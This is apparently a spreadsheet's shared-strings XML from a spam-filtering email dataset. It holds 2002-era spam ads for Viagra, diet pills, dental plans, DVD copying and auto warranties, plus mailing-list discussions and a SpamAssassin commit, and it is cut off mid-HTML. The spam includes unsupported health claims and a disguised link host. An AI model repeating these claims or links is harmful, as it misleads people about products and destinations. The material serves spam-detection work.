 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Garden Ornaments | ppu
</t>
  </si>
  <si>
    <t xml:space="preserve">Our delightful garden ornaments combine the finest craftsmanship in woodworking with the lastest technology in paints and hardware:
 http://www.gardenornaments.adv@hellerwhirligigs.com/
 We are the world's biggest whirligig maker.
 Sincerely,
 Studio T. Inc., USA
 The Home of Heller Whirligigs
 Remove:
 E-mail based commercial communication avoids unnecessary spending on catalogs and paper, and helps to preserve valuable natural resources such as forests and oil. We do not wish to share our valuable information about whirligigs with those who are not interested. Should you not wish to receive information from us in the future, please click on  the following removal link:
 http://www.gardenornaments.adv@hellerwhirligigs.com/remove.html
 Even though our database cleansing might be subject to delay or error, we will remove your e-mail address permanently from our database. However, please realize that removal from our database does not guarantee that your e-mail address will be deleted from the many other e-mail marketers who construct databases themselves by harvesting from web sites, or by buying any of the thousands of lists of e-mail addresses that are openly for sale on the internet.
 ...
 sgossqweylpfdxongtxllytjnmkamyrwrascyl
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Al'Qaeda's fantasy ideology:  Policy Review no. 114
</t>
  </si>
  <si>
    <t xml:space="preserve">My understanding was 'not really'.  They suffered while Cortez was
 there, but they were hardy and exceptionally numerous when he landed.
 That is from C&amp;C and also another book that I admit I only got half way
 through (but long enough for Cortez to get kicked out of the city).
 John Hall
 13464 95th Ave NE
 Kirkland WA 98034
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Gary
 &gt; Lawrence Murphy
 &gt; Sent: Friday, August 16, 2002 9:35 PM
 &gt; To: bitbitch@magnesium.net
 &gt; Cc: fork@spamassassin.taint.org
 &gt; Subject: Re: Al'Qaeda's fantasy ideology: Policy Review no. 114
 &gt; 
 &gt; 
 &gt; Wasn't the Aztec population that greeted Cortez already largely
 &gt; decimated by the microbiology brought over by DeSoto nearly a hundred
 &gt; years before?
 &gt; 
 &gt; --
 &gt; Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications
 Inc
 &gt;  Business Advantage through Community Software :
 http://www.teledyn.com
 &gt; "Computers are useless.  They can only give you answers."(Pablo
 Picasso)
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: pick up the phone
</t>
  </si>
  <si>
    <t xml:space="preserve">Welcome to Viagra Express!
 http://www.universalmeds.com/main2.php?rx=16863
 Our objective at Viagra Express is simple! We want to provide only 
 genuine FDA approved VIAGRA to you at the lowest possible prices.
 Some important factors that set us apart from our competition:
 * CONFIDENTIAL ONLINE DR. CONSULTATION
 * GLOBAL PHYSICIAN NETWORK OF 200+ LICENSED PHYSICIANS
 * WORLDWIDE 24 HOUR DELIVERY UPON ORDER APPROVAL
 * SIMPLY THE LOWEST PRICES
 * NO-CHARGE FOR ANY ORDER NOT APPROVED FOR ANY REASON
 * DISCRETION ASSURED, SATISFACTION GUARANTEED
  http://www.universalmeds.com/main2.php?rx=16863
  We also carry 4 other products from weight loss to hair loss products.
 iyrys
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Chris wrote :
 &gt; To bring things back on topic, I was practicing my "rpmbuild'n skillz"
 &gt; and made an rpm with some simple software tools to drive my DVD+RW
 &gt; burner. No GUI frontend, but it works just fine from the command line. I
 &gt; even used it to burn a bootable DVD version of Red Hat 7.3.
 &gt; 
 &gt; ftp://people.redhat.com/ckloiber/dvd+rw-tools-0.1.src.rpm
 Nice! :-)
 What about the "dvdrecord" package that's already included in 7.3? It
 doesn't do what this one does? I'm asking this because I've got a friend
 with an iMac running YellowDog Linux (basically Red Hat Linux for PPC), and
 it's one of the newer versions with a DVD burner. I'd be very interested in
 using his drive to burn DVDs full of 2-CDs movies or full of "files for
 xmame" ;-)
 Also, a bootable DVD of Red Hat Linux 7.3 would be great as I've still not
 burned the CDs even once for myself since I always install through the
 network (and haven't found an easy way of purchasing an english boxed set
 here in Spain...).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</si>
  <si>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Copy DVD Movies to CD-R
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;COPY YOUR DVD MOVIES!&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#669999" text="#000000" link="#003399" vlink="#003399" alink="#003399"&gt;
 &lt;table width="600" border="2" cellspacing="0" cellpadding="0" align="center" bordercolor="#006666" bgcolor="#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td align="center" valign="middle" height="247"&gt; &lt;br&gt;
       &lt;table width="570" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
         &lt;tr&gt; 
           &lt;td width="125" align="left" valign="top" height="234"&gt; 
             &lt;div align="center"&gt; 
               &lt;p&gt;&lt;img src="http://image.consumerpackage.net/promotions/copymydvd/dvdcopyplusbox.jpg" width="125" height="163"&gt;&lt;br&gt;
                 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://track.consumerpackage.net/cgi-bin/dvd?e=651176.15"&gt;&lt;br&gt;
                 &lt;b&gt;CLICK HERE FOR&lt;br&gt;
                 &lt;font size="5"&gt;FREE&lt;/font&gt;&lt;br&gt;
                 SOFTWARE!&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;/div&gt;
           &lt;/td&gt;
           &lt;td width="445" align="left" valign="top" height="234"&gt; 
             &lt;p align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="4"&gt;&lt;b&gt;&lt;font size="5" color="#CC0000"&gt;COPY 
               DVD MOVIES TO CD-R&lt;br&gt;
               RIGHT NOW!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;blockquote&gt; 
               &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;font size="4"&gt;&lt;i&gt;&lt;font color="#003399"&gt;NEW!&lt;/font&gt;&lt;/i&gt; 
                 &lt;/font&gt;&lt;font color="#003399"&gt;&lt;b&gt;&lt;font size="4"&gt;DVDCopyPlus 4.0&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
                 All the software you need to COPY your own DVD Movies is included 
                 in DVDCopyPlus4.0! &lt;/font&gt;&lt;/p&gt;
               &lt;p&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Copy 
                 your own DVD Movies using nothing more than our software, a DVD-ROM 
                 and your CD-R burner!&lt;/font&gt;&lt;/p&gt;
               &lt;ul&gt;
                 &lt;li&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Backup 
                   your DVD Movie Collection&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
                 &lt;li&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Playback 
                   on any home DVD player*&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
                 &lt;li&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;No 
                   Expensive DVD Burner Required&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
                 &lt;li&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;Free 
                   Live Tech Support&lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;br&gt;
                   &lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
               &lt;/ul&gt;
               &lt;/blockquote&gt;
             &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align="left" valign="top"&gt; 
           &lt;td colspan="2" height="2"&gt;
             &lt;div align="center"&gt;&lt;font size="1" face="Verdana, Arial, Helvetica, sans-serif"&gt;*DVD 
               Player must support VCD/SVCD format. Most DVD players include this 
               feature.&lt;/font&gt; &lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt; 
 &lt;p&gt;&lt;font face=Arial size=1&gt;You received this email because you signed up at one of Consumer Media's websites or you signed up with a party that has contracted with Consumer Media. To unsubscribe from our email newsletter, please visit &lt;a href=http://opt-out.consumerpackage.net/?e=cdr@lne.com&gt;http://opt-out.consumerpackage.net/?e=cdr@lne.com&lt;/a&gt;. &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;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</si>
  <si>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Your Vehicle Warranty               PFYEXHF
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;center&gt;&lt;FONT SIZE=3D4 COLOR=3D#FF3300&gt;&lt;B&gt;Protect =
 your financial well-being.&lt;BR&gt;Purchase an Extended Auto Warranty for your =
 Vehicle TODAY.&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT FACE=3DArial SIZE=3D4 COLOR=3D#=
 CC0000&gt;&lt;B&gt;&lt;U&gt;&lt;A HREF=3Dhttp://www.qz932.com/auto/&gt;Click Here for your free=
 , Fast, no BS Rates NOW!!&lt;/A&gt;&lt;/U&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;br&gt;&lt;FONT&gt;&lt;B&gt;&lt;/center&gt;Car =
 troubles and expensive repair bills always seem to happen at the worst pos=
 sible time Dont they?. Protect yourself and your family with an Extended&lt;b=
 r&gt;Warranty for your car, truck, or SUV, so that a large expense cannot hit=
  you all at once. We cover most vehicles with less than 150,000 miles.&lt;/B&gt;=
 &lt;/FONT&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;FONT SIZE=3D4 COLOR=3D#FF3333&gt;&lt;B&gt;&lt;I&gt;Our warranties are=
  the same as the dealer offers but instead&lt;BR&gt;you are purchasing them dire=
 ct!!!&lt;/I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT SIZE=3D3&gt;&lt;B&gt;&lt;I&gt;We offer fair prices =
 and prompt, toll-free claims service. Get an Extended Warranty on your veh=
 icle today.&lt;/I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;&lt;br&gt;&lt;A HREF=3Dhttp://www.qz932.com/auto/&gt;Cli=
 ck here today and we will include at no extra cost:&lt;/A&gt;&lt;br&gt;&lt;Br&gt;&lt;UL TYPE=3D=
 CIRCLE&gt;&lt;BR&gt;&lt;LI&gt;24-Hour Roadside Assistance.&lt;LI&gt;Car Rental Benefits.&lt;LI&gt;Tri=
 p Interruption Benefits.&lt;LI&gt;Extended Towing Benefits.&lt;/UL&gt;&lt;A HREF=3Dhttp:/=
 /www.qz932.com/auto/&gt;Click Here for your free, Fast, no BS Rates NOW!!&lt;/A&gt;=
 &lt;br&gt;&lt;br&gt;Save now, don't wait until it is TOO LATE!&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;=
 &lt;FONT SIZE=3D1 COLOR=3D#FFFF99&gt;We search for the best offering's for&lt;br&gt;yo=
 u; we do the research and you get only The superior results&lt;br&gt;this email =
 is brought to you by; KBR . To abnegate&lt;br&gt;all future notices, &lt;FONT COLOR=
 =3D#FFFF66&gt;&lt;A HREF=3Dhttp://www.qz932.com/index2.html&gt;Enter here&lt;/A&gt;&lt;/FONT=
 &gt;&lt;/FONT&gt;&lt;/BODY&gt;&lt;/HTML&gt;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</si>
  <si>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On Sat, 17 Aug 2002, Chris Arkenberg wrote:
 &gt; This just strikes me as being so ridiculously bizarre. We are truly 
 If it strikes you as being ridiculously bizarre, you're probably right.  
 Because it is ridiculous, and bizarre.
 &gt; beginning to blur reality with science fiction. Makes me think of  Minority 
 No, rather a new breakthrough in ballistic snake oil delivery. So it's
 built into a walkthrough gate, and is noninvasive. It's supposed to
 analyse brain and heart activity. While you can pick up heartbeat by
 Doppler radar, later tells it's realtime DSP on an array of SQIDs. Later
 they mention they use passive IR imaging and eye saccade evaluation. Maybe
 they're also doing a Kirlian reading, and recording your mana flux, too.
 (Conclusive evaluation by entrail reading is nonoptional only for
 confirmed terrorists).
 So they claim terrorist intent translates in biosignatures they can pick
 up by close-distance passive telemetry, in realtime, with a very low
 number of false positives, while having no chance to calibrate, in the
 field.
 Right.
 Seems somebody is so awfully eager to pick up a slice of research grant
 pie from the heimatland securitate money they haven't even bothered to 
 invent a plausible lie.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin/wordfreqs RUNME,1.1,1.1.4.1
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/wordfreqs
 In directory usw-pr-cvs1:/tmp/cvs-serv17442/wordfreqs
 Modified Files:
       Tag: b2_4_0
 	RUNME 
 Log Message:
 added a warning for ISPs in required_hits manual entry
 Index: RUNME
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/wordfreqs/RUNME,v
 retrieving revision 1.1
 retrieving revision 1.1.4.1
 diff -b -w -u -d -r1.1 -r1.1.4.1
 --- RUNME	15 Jan 2002 05:34:18 -0000	1.1
 +++ RUNME	21 Aug 2002 16:32:55 -0000	1.1.4.1
 @@ -13,17 +13,20 @@
  mv spam.local nonspam.local logs/old
 -./mass-phrase-freq /local2/mail-archives/scoop.1999.gz &gt;&gt; nonspam.local
 -./mass-phrase-freq /local2/mail-archives/oldmail.1998.gz &gt;&gt; nonspam.local
 -
  ./mass-phrase-freq-for-jm ; sh commands.sh
 -for f in /local2/mail-archives/crackmice-old/* ; do
 -  ./mass-phrase-freq $f &gt;&gt; nonspam.local
 +for f in /local/mail-archives/recent/nonspam/* ; do
 +  echo Checking $f: ; ./mass-phrase-freq $f  &gt;&gt; nonspam.local
  done
 -./mass-phrase-freq /local2/mail-archives/kelsey.spamtrap.gz &gt;&gt; spam.local
 -./mass-phrase-freq /local2/mail-archives/spam.2000-2001.gz &gt;&gt; spam.local
 +./mass-phrase-freq /local/mail-archives/recent/spamtrap/20020717/nonspam.mbox &gt;&gt; nonspam.local
 +
 +./mass-phrase-freq /local/mail-archives/recent/spamtrap/20020717/mbox &gt;&gt; spam.local
 +
 +for f in /local/mail-archives/old/nonspam/* /local/mail-archives/recent/nonspam/*
 +do
 +  echo Checking $f: ; ./mass-phrase-freq $f &gt;&gt; nonspam.local
 +done
  echo "
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lose 20 Pounds In 10 Days                  27540
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;title&gt;LOSE WEIGHT FAST&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFCC"&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"1" width=3D"83%" height=3D"287" bgcolor=3D"#000080" bor=
 dercolorlight=3D"#FFFF99"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"281" style=3D"color: #FFFFFF"&gt;
         &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
           &lt;table border=3D"0" width=3D"100%" height=3D"74"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" height=3D"68" style=3D"color: #000080" al=
 ign=3D"center" bgcolor=3D"#FFFFCC"&gt;&lt;b&gt;&lt;font size=3D"5" face=3D"Century Got=
 hic"&gt;LOSE WEIGHT FAST, WITHOUT SPECIAL DIETS OR EXPENSIVE FOODS
                 &amp;amp; NO STARVING YOURSELF!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
         &lt;p align=3D"center"&gt;&lt;font face=3D"Arial"&gt;
         If you are tired of starvation diets, body wraps, fad diets, gruel=
 ing exercise, or hypnosis to lose weight then you have just made the best =
 choice of your life by
         &lt;b&gt; reading this email!&lt;/b&gt;&lt;br&gt;
         &lt;br&gt;
         We're not kidding, and as you will see we back it up with our &lt;b&gt;L=
 IFETIME MONEY-BACK GUARANTEE!&lt;/b&gt;&lt;br&gt;
 &lt;br&gt;        &lt;b&gt;&lt;font color=3D"#FFFF99" size=3D"4"&gt;        NEW! EXTREME POW=
 ER PLUS&lt;br&gt;        -Proven
         Weight Loss System-&lt;/font&gt;&lt;/b&gt;        &lt;br&gt;
         For More Details or To Order Now Click our URL!&lt;br&gt; &lt;font size=3D"=
 5"&gt;&lt;b&gt;&lt;a href=3D"http://www.2002dietspecials.com/index.shtml" style=3D"col=
 or: #FFFF00"&gt;http://LOSEweightFAST!/ad.html&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p align=3D"center"&gt;&lt;font face=3D"Arial"&gt;&lt;font size=3D"2"&gt;Some Bro=
 wsers do not
         accept hyperlinks, so if the above link does not work,&lt;br&gt; cut &amp;am=
 p; paste
         it in your browser's url box.&lt;br&gt;&lt;/font&gt;
         &lt;br&gt;
         &lt;b&gt;
  &lt;font size=3D"5"&gt;
  LIFETIME MONEY BACK GUARANTEE!&lt;/font&gt;&lt;/b&gt;&lt;br&gt;It's almost to good to be tr=
 ue!&lt;br&gt; Extreme Power Plus is here just in time! &lt;br&gt;&lt;font color=3D"#FFFF0=
 0"&gt;&lt;b&gt;&lt;i&gt;&lt;font size=3D"4"&gt;ORDER
         TODAY&amp;amp; Get FREE SHIPPING*!!!&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;br&gt;
         &lt;/font&gt;
         &lt;br&gt;
         &lt;font size=3D"4"&gt;
         &lt;a href=3D"http://www.2002dietspecials.com/index.shtml" style=3D"c=
 olor: #FFFFFF"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;a href=3D"http://www.2002dietspeci=
 als.com/index.shtml" style=3D"color: #FFFFFF"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;CLICK
         HERE http://LOSEweightFAST!/ad.html&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
         &lt;br&gt;
         &lt;font size=3D"2"&gt;
         As with all dietary supplements or exercise program,&lt;br&gt; please co=
 nsult your physician for their advice.&lt;br&gt;
 &lt;br&gt;        &lt;/font&gt;&lt;font size=3D"1"&gt;*Note: On Orders of 3 bottles or more =
 only (US
         orders only).&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
           &lt;table border=3D"0" width=3D"100%" height=3D"37"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" height=3D"31" style=3D"font-family: Arial=
 ; font-size: 8pt; color: #CCCC00" align=3D"center"&gt;&lt;font face=3D"Arial" si=
 ze=3D"1" color=3D"#CCCC00"&gt;You
                 are receiving this special offer because you have provided
                 permission to receive email communications regarding speci=
 al
                 online promotions or offers. To discontinue any further me=
 ssages
                 from this company, please &lt;a href=3D"mailto:print2@btamail=
 net.cn?Subject=3DUNSUBSCRIBE" style=3D"color: #FFFFFF"&gt;Click
                 Here to Unsubscribe from our Mailing List&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; I think keeping the number of middle letters consistent with the correct
 &gt; spelling is important.
 Aeftr tinryg it out on my lacol daciinorty,
 the worst I cloud find were teilprs, and of
 tehm the most cfinnosug seeemd to be:
 	parental paternal prenatal 
 as cenotxt wloud be mcuh more sacfgiiinnt
 with the rest, scuh as:
 	bakers beakers breaks
 98% of the 45k wdors were uinque.
 -Dave
 1. romaji, or european languages which
 tend to end in vowels, would presumably
 work better with attention on the ending
 syllable (or at least consonant sound)
 2. are typos a larger or smaller space?
 I had a whoromatic proggy that scattered
 transpositions at hazard where the hands
 alternated quickly; that would be a much
 smaller space -- but transposing/eliding
 spaces might make for a much larger one.
</t>
  </si>
  <si>
    <t xml:space="preserve">With the increasing prevalence of web services (not that they are always a
 good thing), I doubt that parsing XML will be something that will remain at
 the Java application layer for long... Recent threads here on Fork
 indicating the move towards hardware parsing or this code even become part
 of the native implementation of Java on various platforms...
 Reza B'Far
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Adam
 L. Beberg
 Sent: Sunday, September 01, 2002 9:01 PM
 To: Mr. FoRK
 Cc: fork@spamassassin.taint.org
 Subject: Re: Java is for kiddies
 On Sun, 1 Sep 2002, Mr. FoRK wrote:
 &gt; &gt; 6.  Hardware is getting so fast that I'm not sure if the performance
 &gt; &gt; difference between Java and C/C++ are relevant any more.
 &gt;
 &gt; When out-of-the-box parsing &amp; transform of XML in java is 25x slower than
 &gt; C++ on the same hardware then it does matter.
 Yea, and that on top of the 100x of all the parsing engines over just
 bigendian'ing it and passing the data (5x+++) in the raw. Then it REALLY
 matters.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Dental Coverage For $6.95 Per Month
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;meta name="Generator" content="Microsoft Publisher 2000"&gt;
 &lt;title&gt;Dental Plans For $6.95 Per Month&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#99ccff" link="#0000ff" vlink="#800080" text="#000000" background="back.gif"  
 topmargin=0 leftmargin=0&gt;
 &lt;a name=top&gt;&lt;/a&gt;
 &lt;table border=0 cellpadding=0 cellspacing=0&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="_blnk.gif" width=9 height=1&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="_blnk.gif" width=11 height=1&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="_blnk.gif" width=6 height=1&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="_blnk.gif" width=56 height=1&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="_blnk.gif" width=8 height=1&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="_blnk.gif" width=5 height=1&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="_blnk.gif" width=85 height=1&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="_blnk.gif" width=55 height=1&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="_blnk.gif" width=31 height=1&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="_blnk.gif" width=136 height=1&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="_blnk.gif" width=120 height=1&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="_blnk.gif" width=2 height=1&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="_blnk.gif" width=18 height=1&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="_blnk.gif" width=14 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=9 height=9&gt;&lt;/td&gt;
 &lt;td width=11&gt;&lt;/td&gt;
 &lt;td width=6&gt;&lt;/td&gt;
 &lt;td width=56&gt;&lt;/td&gt;
 &lt;td width=8&gt;&lt;/td&gt;
 &lt;td width=5&gt;&lt;/td&gt;
 &lt;td width=85&gt;&lt;/td&gt;
 &lt;td width=55&gt;&lt;/td&gt;
 &lt;td width=31&gt;&lt;/td&gt;
 &lt;td width=136&gt;&lt;/td&gt;
 &lt;td width=120&gt;&lt;/td&gt;
 &lt;td width=2&gt;&lt;/td&gt;
 &lt;td width=18&gt;&lt;/td&gt;
 &lt;td width=14&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=15&gt;&lt;/td&gt;
 &lt;td width=73 height=73 colspan=3 rowspan=3 valign=top align=left&gt;
 &lt;img src="http://www.firstdentalplans.com/sys-tmpl/nss-folder/scrapbook/304000.JPG" 73 height=73 
 border=0&gt;&lt;br&gt;
 &lt;td colspan=10&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=43&gt;&lt;/td&gt;
 &lt;td colspan=2&gt;&lt;/td&gt;
 &lt;td width=461 height=43 colspan=8 rowspan=1 valign=top align=left&gt;
 &lt;table border=0 cellpadding=0 cellspacing=0&gt;
 &lt;tr&gt;
 &lt;td width=461 height=4 colspan=3 bgcolor=#000099&gt;&lt;img src="_blnk.gif" width=461 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=4 height=35 bgcolor=#000099&gt;&lt;img src="_blnk.gif" width=4 height=1&gt;&lt;/td&gt;
 &lt;td width=453 height=35 valign=top align=left&gt;
 &lt;table border=0 cellpadding=0 cellspacing=0&gt;
 &lt;tr&gt;
 &lt;td width=3 height=3&gt;&lt;/td&gt;
 &lt;td width=445&gt;&lt;/td&gt;
 &lt;td width=3&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=27&gt;&lt;/td&gt;
 &lt;td width=445 height=27 valign=top align=left&gt;
 &lt;p align=left&gt;&lt;font face="Arial" color=#000000 size=5&gt;&lt;B&gt;Dental Plans For $6.95 Per 
 Month&lt;br&gt;&lt;/B&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=3&gt;&lt;/td&gt;
 &lt;td colspan=2&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;td width=4 height=35 bgcolor=#000099&gt;&lt;img src="_blnk.gif" width=4 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=461 height=4 colspan=3 bgcolor=#000099&gt;&lt;img src="_blnk.gif" width=461 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=15&gt;&lt;/td&gt;
 &lt;td colspan=10&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=2&gt;&lt;/td&gt;
 &lt;td colspan=13&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=27&gt;&lt;/td&gt;
 &lt;td&gt;&lt;/td&gt;
 &lt;td width=522 height=27 colspan=11 rowspan=1 valign=top align=left&gt;
 &lt;table border=0 cellpadding=0 cellspacing=0&gt;
 &lt;tr&gt;
 &lt;td width=3 height=3&gt;&lt;/td&gt;
 &lt;td width=514&gt;&lt;/td&gt;
 &lt;td width=3&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=19&gt;&lt;/td&gt;
 &lt;td width=514 height=19 valign=top align=left&gt;
 &lt;p align=center&gt;&lt;center&gt;&lt;font face="Arial" color=#000000 size=3&gt;&lt;I&gt;&lt;B&gt;Dental Plans For You And Your 
 Entire Family&lt;br&gt;&lt;/B&gt;&lt;/I&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=3&gt;&lt;/td&gt;
 &lt;td colspan=2&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=15&gt;&lt;/td&gt;
 &lt;td colspan=13&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=109&gt;&lt;/td&gt;
 &lt;td colspan=4&gt;&lt;/td&gt;
 &lt;td width=145 height=109 colspan=3 rowspan=1 valign=top align=left&gt;
 &lt;img src="http://www.firstdentalplans.com/sys-tmpl/nss-folder/scrapbook/Girl.jpg" 145 height=109 border=0 
 src="img1.jpg" 
 usemap="#map956"&gt;&lt;/td&gt;
 &lt;td&gt;&lt;/td&gt;
 &lt;td width=256 height=111 colspan=2 rowspan=2 valign=top align=left&gt;
 &lt;table border=0 cellpadding=0 cellspacing=0&gt;
 &lt;tr&gt;
 &lt;td width=255 height=1 colspan=3 bgcolor=#000000&gt;&lt;img src="_blnk.gif" width=255 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
